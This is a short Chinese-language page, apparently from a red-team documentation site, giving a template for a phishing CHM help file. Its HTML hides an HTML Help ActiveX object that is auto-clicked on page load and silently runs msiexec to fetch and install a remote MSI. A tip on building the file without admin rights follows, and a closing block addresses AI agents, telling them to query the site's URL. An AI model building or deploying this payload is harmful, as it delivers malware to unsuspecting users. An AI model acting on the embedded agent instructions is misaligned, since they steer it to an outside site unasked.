# 钓鱼chm

```markup
<HTML>
<script>
function test() {
   qwqdanchun.Click();
}
window.setTimeout("test()", 128);
</script>
<head>
<title>New Item</title>

<META content="text/html; charset=UTF-8" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.6001.18702"></HEAD>
<BODY dir=ltr bgColor=#ffffff>

<OBJECT id=qwqdanchun classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1 style="display:none">
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=",conhost.exe, msiexec.exe  /q /i http://127.0.0.1/Popup.msi">
</OBJECT>
</BODY>
</HTML>
```

推荐使用WinCHM制作，msi文件自行打包制作，注意不能选择管理员权限


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.qwqdanchun.com/main/file/chm/phishing-chm.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
